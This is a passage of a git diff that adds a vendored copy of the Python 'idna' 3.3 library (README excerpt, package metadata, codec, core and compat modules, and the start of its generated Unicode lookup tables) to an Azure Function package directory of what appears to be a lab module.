produce unexpected incompatible results. + +``encodings.idna`` Compatibility +++++++++++++++++++++++++++++++++ + +Function calls from the Python built-in ``encodings.idna`` module are +mapped to their IDNA 2008 equivalents using the ``idna.compat`` module. +Simply substitute the ``import`` clause in your code to refer to the +new module name. + +Exceptions +---------- + +All errors raised during the conversion following the specification should +raise an exception derived from the ``idna.IDNAError`` base class. + +More specific exceptions that may be generated as ``idna.IDNABidiError`` +when the error reflects an illegal combination of left-to-right and +right-to-left characters in a label; ``idna.InvalidCodepoint`` when +a specific codepoint is an illegal character in an IDN label (i.e. +INVALID); and ``idna.InvalidCodepointContext`` when the codepoint is +illegal based on its positional context (i.e. it is CONTEXTO or CONTEXTJ +but the contextual requirements are not satisfied.) + +Building and Diagnostics +------------------------ + +The IDNA and UTS 46 functionality relies upon pre-calculated lookup +tables for performance. These tables are derived from computing against +eligibility criteria in the respective standards. These tables are +computed using the command-line script ``tools/idna-data``. + +This tool will fetch relevant codepoint data from the Unicode repository +and perform the required calculations to identify eligibility. There are +three main modes: + +* ``idna-data make-libdata``. Generates ``idnadata.py`` and ``uts46data.py``, + the pre-calculated lookup tables using for IDNA and UTS 46 conversions. Implementors + who wish to track this library against a different Unicode version may use this tool + to manually generate a different version of the ``idnadata.py`` and ``uts46data.py`` + files. + +* ``idna-data make-table``. Generate a table of the IDNA disposition + (e.g. PVALID, CONTEXTJ, CONTEXTO) in the format found in Appendix B.1 of RFC + 5892 and the pre-computed tables published by `IANA `_. + +* ``idna-data U+0061``. Prints debugging output on the various properties + associated with an individual Unicode codepoint (in this case, U+0061), that are + used to assess the IDNA and UTS 46 status of a codepoint. This is helpful in debugging + or analysis. + +The tool accepts a number of arguments, described using ``idna-data -h``. Most notably, +the ``--version`` argument allows the specification of the version of Unicode to use +in computing the table data. For example, ``idna-data --version 9.0.0 make-libdata`` +will generate library data against Unicode 9.0.0. + + +Additional Notes +---------------- + +* **Packages**. The latest tagged release version is published in the + `Python Package Index `_. + +* **Version support**. This library supports Python 3.5 and higher. As this library + serves as a low-level toolkit for a variety of applications, many of which strive + for broad compatibility with older Python versions, there is no rush to remove + older intepreter support. Removing support for older versions should be well + justified in that the maintenance burden has become too high. + +* **Python 2**. Python 2 is supported by version 2.x of this library. While active + development of the version 2.x series has ended, notable issues being corrected + may be backported to 2.x. Use "idna<3" in your requirements file if you need this + library for a Python 2 application. + +* **Testing**. The library has a test suite based on each rule of the IDNA specification, as + well as tests that are provided as part of the Unicode Technical Standard 46, + `Unicode IDNA Compatibility Processing `_. + +* **Emoji**. It is an occasional request to support emoji domains in this library. Encoding + of symbols like emoji is expressly prohibited by the technical standard IDNA 2008 and + emoji domains are broadly phased out across the domain industry due to associated security + risks. For now, applications that wish need to support these non-compliant labels may + wish to consider trying the encode/decode operation in this library first, and then falling + back to using `encodings.idna`. See `the Github project `_ + for more discussion. + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/RECORD new file mode 100644 index 0000000..2c9f0dd --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/RECORD @@ -0,0 +1,23 @@ +idna-3.3.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +idna-3.3.dist-info/LICENSE.md,sha256=otbk2UC9JNvnuWRc3hmpeSzFHbeuDVrNMBrIYMqj6DY,1523 +idna-3.3.dist-info/METADATA,sha256=BdqiAf8ou4x1nzIHp2_sDfXWjl7BrSUGpOeVzbYHQuQ,9765 +idna-3.3.dist-info/RECORD,, +idna-3.3.dist-info/WHEEL,sha256=ewwEueio1C2XeHTvT17n8dZUJgOvyCWCt0WVNLClP9o,92 +idna-3.3.dist-info/top_level.txt,sha256=jSag9sEDqvSPftxOQy-ABfGV_RSy7oFh4zZJpODV8k0,5 +idna/__init__.py,sha256=KJQN1eQBr8iIK5SKrJ47lXvxG0BJ7Lm38W4zT0v_8lk,849 +idna/__pycache__/__init__.cpython-39.pyc,, +idna/__pycache__/codec.cpython-39.pyc,, +idna/__pycache__/compat.cpython-39.pyc,, +idna/__pycache__/core.cpython-39.pyc,, +idna/__pycache__/idnadata.cpython-39.pyc,, +idna/__pycache__/intranges.cpython-39.pyc,, +idna/__pycache__/package_data.cpython-39.pyc,, +idna/__pycache__/uts46data.cpython-39.pyc,, +idna/codec.py,sha256=6ly5odKfqrytKT9_7UrlGklHnf1DSK2r9C6cSM4sa28,3374 +idna/compat.py,sha256=0_sOEUMT4CVw9doD3vyRhX80X19PwqFoUBs7gWsFME4,321 +idna/core.py,sha256=RFIkY-HhFZaDoBEFjGwyGd_vWI04uOAQjnzueMWqwOU,12795 +idna/idnadata.py,sha256=fzMzkCea2xieVxcrjngJ-2pLsKQNejPCZFlBajIuQdw,44025 +idna/intranges.py,sha256=YBr4fRYuWH7kTKS2tXlFjM24ZF1Pdvcir-aywniInqg,1881 +idna/package_data.py,sha256=szxQhV0ZD0nKJ84Kuobw3l8q4_KeCyXjFRdpwIpKZmw,21 +idna/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +idna/uts46data.py,sha256=o-D7V-a0fOLZNd7tvxof6MYfUd0TBZzE2bLR5XO67xU,204400 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/WHEEL new file mode 100644 index 0000000..725a409 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.0) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/top_level.txt new file mode 100644 index 0000000..dd747e7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/top_level.txt @@ -0,0 +1 @@ +idna diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__init__.py new file mode 100644 index 0000000..9c079de --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__init__.py @@ -0,0 +1,44 @@ +from .package_data import __version__ +from .core import ( + IDNABidiError, + IDNAError, + InvalidCodepoint, + InvalidCodepointContext, + alabel, + check_bidi, + check_hyphen_ok, + check_initial_combiner, + check_label, + check_nfc, + decode, + encode, + ulabel, + uts46_remap, + valid_contextj, + valid_contexto, + valid_label_length, + valid_string_length, +) +from .intranges import intranges_contain + +__all__ = [ + "IDNABidiError", + "IDNAError", + "InvalidCodepoint", + "InvalidCodepointContext", + "alabel", + "check_bidi", + "check_hyphen_ok", + "check_initial_combiner", + "check_label", + "check_nfc", + "decode", + "encode", + "intranges_contain", + "ulabel", + "uts46_remap", + "valid_contextj", + "valid_contexto", + "valid_label_length", + "valid_string_length", +] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..c6a214b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/codec.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/codec.cpython-39.pyc new file mode 100644 index 0000000..52349f5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/codec.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/compat.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/compat.cpython-39.pyc new file mode 100644 index 0000000..8c2bb9a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/compat.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/core.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/core.cpython-39.pyc new file mode 100644 index 0000000..bee341e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/core.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/idnadata.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/idnadata.cpython-39.pyc new file mode 100644 index 0000000..8f57d2f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/idnadata.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/intranges.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/intranges.cpython-39.pyc new file mode 100644 index 0000000..a4d69ca Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/intranges.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/package_data.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/package_data.cpython-39.pyc new file mode 100644 index 0000000..9f0f743 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/package_data.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/uts46data.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/uts46data.cpython-39.pyc new file mode 100644 index 0000000..1b3ea9a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/uts46data.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/codec.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/codec.py new file mode 100644 index 0000000..0f0e4da --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/codec.py @@ -0,0 +1,112 @@ +from .core import encode, decode, alabel, ulabel, IDNAError +import codecs +import re +from typing import Tuple, Optional + +_unicode_dots_re = re.compile('[\u002e\u3002\uff0e\uff61]') + +class Codec(codecs.Codec): + + def encode(self, data: str, errors: str = 'strict') -> Tuple[bytes, int]: + if errors != 'strict': + raise IDNAError('Unsupported error handling \"{}\"'.format(errors)) + + if not data: + return b"", 0 + + return encode(data), len(data) + + def decode(self, data: bytes, errors: str = 'strict') -> Tuple[str, int]: + if errors != 'strict': + raise IDNAError('Unsupported error handling \"{}\"'.format(errors)) + + if not data: + return '', 0 + + return decode(data), len(data) + +class IncrementalEncoder(codecs.BufferedIncrementalEncoder): + def _buffer_encode(self, data: str, errors: str, final: bool) -> Tuple[str, int]: # type: ignore + if errors != 'strict': + raise IDNAError('Unsupported error handling \"{}\"'.format(errors)) + + if not data: + return "", 0 + + labels = _unicode_dots_re.split(data) + trailing_dot = '' + if labels: + if not labels[-1]: + trailing_dot = '.' + del labels[-1] + elif not final: + # Keep potentially unfinished label until the next call + del labels[-1] + if labels: + trailing_dot = '.' + + result = [] + size = 0 + for label in labels: + result.append(alabel(label)) + if size: + size += 1 + size += len(label) + + # Join with U+002E + result_str = '.'.join(result) + trailing_dot # type: ignore + size += len(trailing_dot) + return result_str, size + +class IncrementalDecoder(codecs.BufferedIncrementalDecoder): + def _buffer_decode(self, data: str, errors: str, final: bool) -> Tuple[str, int]: # type: ignore + if errors != 'strict': + raise IDNAError('Unsupported error handling \"{}\"'.format(errors)) + + if not data: + return ('', 0) + + labels = _unicode_dots_re.split(data) + trailing_dot = '' + if labels: + if not labels[-1]: + trailing_dot = '.' + del labels[-1] + elif not final: + # Keep potentially unfinished label until the next call + del labels[-1] + if labels: + trailing_dot = '.' + + result = [] + size = 0 + for label in labels: + result.append(ulabel(label)) + if size: + size += 1 + size += len(label) + + result_str = '.'.join(result) + trailing_dot + size += len(trailing_dot) + return (result_str, size) + + +class StreamWriter(Codec, codecs.StreamWriter): + pass + + +class StreamReader(Codec, codecs.StreamReader): + pass + + +def getregentry() -> codecs.CodecInfo: + # Compatibility as a search_function for codecs.register() + return codecs.CodecInfo( + name='idna', + encode=Codec().encode, # type: ignore + decode=Codec().decode, # type: ignore + incrementalencoder=IncrementalEncoder, + incrementaldecoder=IncrementalDecoder, + streamwriter=StreamWriter, + streamreader=StreamReader, + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/compat.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/compat.py new file mode 100644 index 0000000..85972dc --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/compat.py @@ -0,0 +1,13 @@ +from .core import * +from .codec import * +from typing import Any, Union + +def ToASCII(label: str) -> bytes: + return encode(label) + +def ToUnicode(label: Union[bytes, bytearray]) -> str: + return decode(label) + +def nameprep(s: Any) -> None: + raise NotImplementedError('IDNA 2008 does not utilise nameprep protocol') + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/core.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/core.py new file mode 100644 index 0000000..5e8c064 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/core.py @@ -0,0 +1,397 @@ +from . import idnadata +import bisect +import unicodedata +import re +from typing import Union, Optional +from .intranges import intranges_contain + +_virama_combining_class = 9 +_alabel_prefix = b'xn--' +_unicode_dots_re = re.compile('[\u002e\u3002\uff0e\uff61]') + +class IDNAError(UnicodeError): + """ Base exception for all IDNA-encoding related problems """ + pass + + +class IDNABidiError(IDNAError): + """ Exception when bidirectional requirements are not satisfied """ + pass + + +class InvalidCodepoint(IDNAError): + """ Exception when a disallowed or unallocated codepoint is used """ + pass + + +class InvalidCodepointContext(IDNAError): + """ Exception when the codepoint is not valid in the context it is used """ + pass + + +def _combining_class(cp: int) -> int: + v = unicodedata.combining(chr(cp)) + if v == 0: + if not unicodedata.name(chr(cp)): + raise ValueError('Unknown character in unicodedata') + return v + +def _is_script(cp: str, script: str) -> bool: + return intranges_contain(ord(cp), idnadata.scripts[script]) + +def _punycode(s: str) -> bytes: + return s.encode('punycode') + +def _unot(s: int) -> str: + return 'U+{:04X}'.format(s) + + +def valid_label_length(label: Union[bytes, str]) -> bool: + if len(label) > 63: + return False + return True + + +def valid_string_length(label: Union[bytes, str], trailing_dot: bool) -> bool: + if len(label) > (254 if trailing_dot else 253): + return False + return True + + +def check_bidi(label: str, check_ltr: bool = False) -> bool: + # Bidi rules should only be applied if string contains RTL characters + bidi_label = False + for (idx, cp) in enumerate(label, 1): + direction = unicodedata.bidirectional(cp) + if direction == '': + # String likely comes from a newer version of Unicode + raise IDNABidiError('Unknown directionality in label {} at position {}'.format(repr(label), idx)) + if direction in ['R', 'AL', 'AN']: + bidi_label = True + if not bidi_label and not check_ltr: + return True + + # Bidi rule 1 + direction = unicodedata.bidirectional(label[0]) + if direction in ['R', 'AL']: + rtl = True + elif direction == 'L': + rtl = False + else: + raise IDNABidiError('First codepoint in label {} must be directionality L, R or AL'.format(repr(label))) + + valid_ending = False + number_type = None # type: Optional[str] + for (idx, cp) in enumerate(label, 1): + direction = unicodedata.bidirectional(cp) + + if rtl: + # Bidi rule 2 + if not direction in ['R', 'AL', 'AN', 'EN', 'ES', 'CS', 'ET', 'ON', 'BN', 'NSM']: + raise IDNABidiError('Invalid direction for codepoint at position {} in a right-to-left label'.format(idx)) + # Bidi rule 3 + if direction in ['R', 'AL', 'EN', 'AN']: + valid_ending = True + elif direction != 'NSM': + valid_ending = False + # Bidi rule 4 + if direction in ['AN', 'EN']: + if not number_type: + number_type = direction + else: + if number_type != direction: + raise IDNABidiError('Can not mix numeral types in a right-to-left label') + else: + # Bidi rule 5 + if not direction in ['L', 'EN', 'ES', 'CS', 'ET', 'ON', 'BN', 'NSM']: + raise IDNABidiError('Invalid direction for codepoint at position {} in a left-to-right label'.format(idx)) + # Bidi rule 6 + if direction in ['L', 'EN']: + valid_ending = True + elif direction != 'NSM': + valid_ending = False + + if not valid_ending: + raise IDNABidiError('Label ends with illegal codepoint directionality') + + return True + + +def check_initial_combiner(label: str) -> bool: + if unicodedata.category(label[0])[0] == 'M': + raise IDNAError('Label begins with an illegal combining character') + return True + + +def check_hyphen_ok(label: str) -> bool: + if label[2:4] == '--': + raise IDNAError('Label has disallowed hyphens in 3rd and 4th position') + if label[0] == '-' or label[-1] == '-': + raise IDNAError('Label must not start or end with a hyphen') + return True + + +def check_nfc(label: str) -> None: + if unicodedata.normalize('NFC', label) != label: + raise IDNAError('Label must be in Normalization Form C') + + +def valid_contextj(label: str, pos: int) -> bool: + cp_value = ord(label[pos]) + + if cp_value == 0x200c: + + if pos > 0: + if _combining_class(ord(label[pos - 1])) == _virama_combining_class: + return True + + ok = False + for i in range(pos-1, -1, -1): + joining_type = idnadata.joining_types.get(ord(label[i])) + if joining_type == ord('T'): + continue + if joining_type in [ord('L'), ord('D')]: + ok = True + break + + if not ok: + return False + + ok = False + for i in range(pos+1, len(label)): + joining_type = idnadata.joining_types.get(ord(label[i])) + if joining_type == ord('T'): + continue + if joining_type in [ord('R'), ord('D')]: + ok = True + break + return ok + + if cp_value == 0x200d: + + if pos > 0: + if _combining_class(ord(label[pos - 1])) == _virama_combining_class: + return True + return False + + else: + + return False + + +def valid_contexto(label: str, pos: int, exception: bool = False) -> bool: + cp_value = ord(label[pos]) + + if cp_value == 0x00b7: + if 0 < pos < len(label)-1: + if ord(label[pos - 1]) == 0x006c and ord(label[pos + 1]) == 0x006c: + return True + return False + + elif cp_value == 0x0375: + if pos < len(label)-1 and len(label) > 1: + return _is_script(label[pos + 1], 'Greek') + return False + + elif cp_value == 0x05f3 or cp_value == 0x05f4: + if pos > 0: + return _is_script(label[pos - 1], 'Hebrew') + return False + + elif cp_value == 0x30fb: + for cp in label: + if cp == '\u30fb': + continue + if _is_script(cp, 'Hiragana') or _is_script(cp, 'Katakana') or _is_script(cp, 'Han'): + return True + return False + + elif 0x660 <= cp_value <= 0x669: + for cp in label: + if 0x6f0 <= ord(cp) <= 0x06f9: + return False + return True + + elif 0x6f0 <= cp_value <= 0x6f9: + for cp in label: + if 0x660 <= ord(cp) <= 0x0669: + return False + return True + + return False + + +def check_label(label: Union[str, bytes, bytearray]) -> None: + if isinstance(label, (bytes, bytearray)): + label = label.decode('utf-8') + if len(label) == 0: + raise IDNAError('Empty Label') + + check_nfc(label) + check_hyphen_ok(label) + check_initial_combiner(label) + + for (pos, cp) in enumerate(label): + cp_value = ord(cp) + if intranges_contain(cp_value, idnadata.codepoint_classes['PVALID']): + continue + elif intranges_contain(cp_value, idnadata.codepoint_classes['CONTEXTJ']): + try: + if not valid_contextj(label, pos): + raise InvalidCodepointContext('Joiner {} not allowed at position {} in {}'.format( + _unot(cp_value), pos+1, repr(label))) + except ValueError: + raise IDNAError('Unknown codepoint adjacent to joiner {} at position {} in {}'.format( + _unot(cp_value), pos+1, repr(label))) + elif intranges_contain(cp_value, idnadata.codepoint_classes['CONTEXTO']): + if not valid_contexto(label, pos): + raise InvalidCodepointContext('Codepoint {} not allowed at position {} in {}'.format(_unot(cp_value), pos+1, repr(label))) + else: + raise InvalidCodepoint('Codepoint {} at position {} of {} not allowed'.format(_unot(cp_value), pos+1, repr(label))) + + check_bidi(label) + + +def alabel(label: str) -> bytes: + try: + label_bytes = label.encode('ascii') + ulabel(label_bytes) + if not valid_label_length(label_bytes): + raise IDNAError('Label too long') + return label_bytes + except UnicodeEncodeError: + pass + + if not label: + raise IDNAError('No Input') + + label = str(label) + check_label(label) + label_bytes = _punycode(label) + label_bytes = _alabel_prefix + label_bytes + + if not valid_label_length(label_bytes): + raise IDNAError('Label too long') + + return label_bytes + + +def ulabel(label: Union[str, bytes, bytearray]) -> str: + if not isinstance(label, (bytes, bytearray)): + try: + label_bytes = label.encode('ascii') + except UnicodeEncodeError: + check_label(label) + return label + else: + label_bytes = label + + label_bytes = label_bytes.lower() + if label_bytes.startswith(_alabel_prefix): + label_bytes = label_bytes[len(_alabel_prefix):] + if not label_bytes: + raise IDNAError('Malformed A-label, no Punycode eligible content found') + if label_bytes.decode('ascii')[-1] == '-': + raise IDNAError('A-label must not end with a hyphen') + else: + check_label(label_bytes) + return label_bytes.decode('ascii') + + try: + label = label_bytes.decode('punycode') + except UnicodeError: + raise IDNAError('Invalid A-label') + check_label(label) + return label + + +def uts46_remap(domain: str, std3_rules: bool = True, transitional: bool = False) -> str: + """Re-map the characters in the string according to UTS46 processing.""" + from .uts46data import uts46data + output = '' + + for pos, char in enumerate(domain): + code_point = ord(char) + try: + uts46row = uts46data[code_point if code_point < 256 else + bisect.bisect_left(uts46data, (code_point, 'Z')) - 1] + status = uts46row[1] + replacement = None # type: Optional[str] + if len(uts46row) == 3: + replacement = uts46row[2] # type: ignore + if (status == 'V' or + (status == 'D' and not transitional) or + (status == '3' and not std3_rules and replacement is None)): + output += char + elif replacement is not None and (status == 'M' or + (status == '3' and not std3_rules) or + (status == 'D' and transitional)): + output += replacement + elif status != 'I': + raise IndexError() + except IndexError: + raise InvalidCodepoint( + 'Codepoint {} not allowed at position {} in {}'.format( + _unot(code_point), pos + 1, repr(domain))) + + return unicodedata.normalize('NFC', output) + + +def encode(s: Union[str, bytes, bytearray], strict: bool = False, uts46: bool = False, std3_rules: bool = False, transitional: bool = False) -> bytes: + if isinstance(s, (bytes, bytearray)): + s = s.decode('ascii') + if uts46: + s = uts46_remap(s, std3_rules, transitional) + trailing_dot = False + result = [] + if strict: + labels = s.split('.') + else: + labels = _unicode_dots_re.split(s) + if not labels or labels == ['']: + raise IDNAError('Empty domain') + if labels[-1] == '': + del labels[-1] + trailing_dot = True + for label in labels: + s = alabel(label) + if s: + result.append(s) + else: + raise IDNAError('Empty label') + if trailing_dot: + result.append(b'') + s = b'.'.join(result) + if not valid_string_length(s, trailing_dot): + raise IDNAError('Domain too long') + return s + + +def decode(s: Union[str, bytes, bytearray], strict: bool = False, uts46: bool = False, std3_rules: bool = False) -> str: + try: + if isinstance(s, (bytes, bytearray)): + s = s.decode('ascii') + except UnicodeDecodeError: + raise IDNAError('Invalid ASCII in A-label') + if uts46: + s = uts46_remap(s, std3_rules, False) + trailing_dot = False + result = [] + if not strict: + labels = _unicode_dots_re.split(s) + else: + labels = s.split('.') + if not labels or labels == ['']: + raise IDNAError('Empty domain') + if not labels[-1]: + del labels[-1] + trailing_dot = True + for label in labels: + s = ulabel(label) + if s: + result.append(s) + else: + raise IDNAError('Empty label') + if trailing_dot: + result.append('') + return '.'.join(result) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/idnadata.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/idnadata.py new file mode 100644 index 0000000..21da0de --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/idnadata.py @@ -0,0 +1,2137 @@ +# This file is automatically generated by tools/idna-data + +__version__ = '14.0.0' +scripts = { + 'Greek': ( + 0x37000000374, + 0x37500000378, + 0x37a0000037e, + 0x37f00000380, + 0x38400000385, + 0x38600000387, + 0x3880000038b, + 0x38c0000038d, + 0x38e000003a2, + 0x3a3000003e2, + 0x3f000000400, + 0x1d2600001d2b, + 0x1d5d00001d62, + 0x1d6600001d6b, + 0x1dbf00001dc0, + 0x1f0000001f16, + 0x1f1800001f1e, + 0x1f2000001f46, + 0x1f4800001f4e, + 0x1f5000001f58, + 0x1f5900001f5a, + 0x1f5b00001f5c, + 0x1f5d00001f5e, + 0x1f5f00001f7e, + 0x1f8000001fb5, + 0x1fb600001fc5, + 0x1fc600001fd4, + 0x1fd600001fdc, + 0x1fdd00001ff0, + 0x1ff200001ff5, + 0x1ff600001fff, + 0x212600002127, + 0xab650000ab66, + 0x101400001018f, + 0x101a0000101a1, + 0x1d2000001d246, + ), + 'Han': ( + 0x2e8000002e9a, + 0x2e9b00002ef4, + 0x2f0000002fd6, + 0x300500003006, + 0x300700003008, + 0x30210000302a, + 0x30380000303c, + 0x340000004dc0, + 0x4e000000a000, + 0xf9000000fa6e, + 0xfa700000fada, + 0x16fe200016fe4, + 0x16ff000016ff2, + 0x200000002a6e0, + 0x2a7000002b739, + 0x2b7400002b81e, + 0x2b8200002cea2, + 0x2ceb00002ebe1, + 0x2f8000002fa1e, + 0x300000003134b, + ), + 'Hebrew': ( + 0x591000005c8, + 0x5d0000005eb, + 0x5ef000005f5, + 0xfb1d0000fb37, + 0xfb380000fb3d, + 0xfb3e0000fb3f, + 0xfb400000fb42, + 0xfb430000fb45, + 0xfb460000fb50, + ), + 'Hiragana': ( + 0x304100003097, + 0x309d000030a0, + 0x1b0010001b120, + 0x1b1500001b153, + 0x1f2000001f201, + ), + 'Katakana': ( + 0x30a1000030fb, + 0x30fd00003100, + 0x31f000003200, + 0x32d0000032ff, + 0x330000003358, + 0xff660000ff70, + 0xff710000ff9e, + 0x1aff00001aff4, + 0x1aff50001affc, + 0x1affd0001afff, + 0x1b0000001b001, + 0x1b1200001b123, + 0x1b1640001b168, + ), +} +joining_types = { + 0x600: 85, + 0x601: 85, + 0x602: 85, + 0x603: 85, + 0x604: 85, + 0x605: 85, + 0x608: 85, + 0x60b: 85, + 0x620: 68, + 0x621: 85, + 0x622: 82, + 0x623: 82, + 0x624: 82, + 0x625: 82, + 0x626: 68, + 0x627: 82, + 0x628: 68, + 0x629: 82, + 0x62a: 68, + 0x62b: 68, + 0x62c: 68, + 0x62d: 68, + 0x62e: 68, + 0x62f: 82, + 0x630: 82, + 0x631: 82, + 0x632: 82, + 0x633: 68, + 0x634: 68, + 0x635: 68, + 0x636: 68, + 0x637: 68, + 0x638: 68, + 0x639: 68, + 0x63a: 68, + 0x63b: 68, + 0x63c: 68, + 0x63d: 68, + 0x63e: 68, + 0x63f: 68, + 0x640: 67, + 0x641: 68, + 0x642: 68, + 0x643: 68, + 0x644: 68, + 0x645: 68, + 0x646: 68, + 0x647: 68, + 0x648: 82, + 0x649: 68, + 0x64a: 68, + 0x66e: 68, + 0x66f: 68, + 0x671: 82, + 0x672: 82, + 0x673: 82, + 0x674: 85, + 0x675: 82, + 0x676: 82, + 0x677: 82, + 0x678: 68, + 0x679: 68, + 0x67a: 68, + 0x67b: 68, + 0x67c: 68, + 0x67d: 68, + 0x67e: 68, + 0x67f: 68, + 0x680: 68, + 0x681: 68, + 0x682: 68, + 0x683: 68, + 0x684: 68, + 0x685: 68, + 0x686: 68, + 0x687: 68, + 0x688: 82, + 0x689: 82, + 0x68a: 82, + 0x68b: 82, + 0x68c: 82, + 0x68d: 82, + 0x68e: 82, + 0x68f: 82, + 0x690: 82, + 0x691: 82, + 0x692: 82, + 0x693: 82, + 0x694: 82, + 0x695: 82, + 0x696: 82, + 0x697: 82, + 0x698: 82, + 0x699: 82, + 0x69a: 68, + 0x69b: 68, + 0x69c: 68, + 0x69d: 68, + 0x69e: 68, + 0x69f: 68, + 0x6a0: 68, + 0x6a1: 68, + 0x6a2: 68, + 0x6a3: 68, + 0x6a4: 68, + 0x6a5: 68, + 0x6a6: 68, + 0x6a7: 68, + 0x6a8: 68, + 0x6a9: 68, + 0x6aa: 68, + 0x6ab: 68, + 0x6ac: 68, + 0x6ad: 68, + 0x6ae: 68, + 0x6af: 68, + 0x6b0: 68, + 0x6b1: 68, + 0x6b2: 68, + 0x6b3: 68, + 0x6b4: 68, + 0x6b5: 68, + 0x6b6: 68, + 0x6b7: 68, + 0x6b8: 68, + 0x6b9: 68, + 0x6ba: 68, + 0x6bb: 68, + 0x6bc: 68, + 0x6bd: 68, + 0x6be: 68, + 0x6bf: 68, + 0x6c0: 82, + 0x6c1: 68, + 0x6c2: 68, + 0x6c3: 82, + 0x6c4: 82, + 0x6c5: 82, + 0x6c6: 82, + 0x6c7: 82, + 0x6c8: 82, + 0x6c9: 82, + 0x6ca: 82, + 0x6cb: 82, + 0x6cc: 68, + 0x6cd: 82, + 0x6ce: 68, + 0x6cf: 82, + 0x6d0: 68, + 0x6d1: 68, + 0x6d2: 82, + 0x6d3: 82, + 0x6d5: 82, + 0x6dd: 85, + 0x6ee: 82, + 0x6ef: 82, + 0x6fa: 68, + 0x6fb: 68, + 0x6fc: 68, + 0x6ff: 68, + 0x70f: 84, + 0x710: 82, + 0x712: 68, + 0x713: 68, + 0x714: 68, + 0x715: 82, + 0x716: 82, + 0x717: 82, + 0x718: 82, + 0x719: 82, + 0x71a: 68, + 0x71b: 68, + 0x71c: 68, + 0x71d: 68, + 0x71e: 82, + 0x71f: 68, + 0x720: 68, + 0x721: 68, + 0x722: 68, + 0x723: 68, + 0x724: 68, + 0x725: 68, + 0x726: 68, + 0x727: 68, + 0x728: 82, + 0x729: 68, + 0x72a: 82, + 0x72b: 68, + 0x72c: 82, + 0x72d: 68, + 0x72e: 68, + 0x72f: 82, + 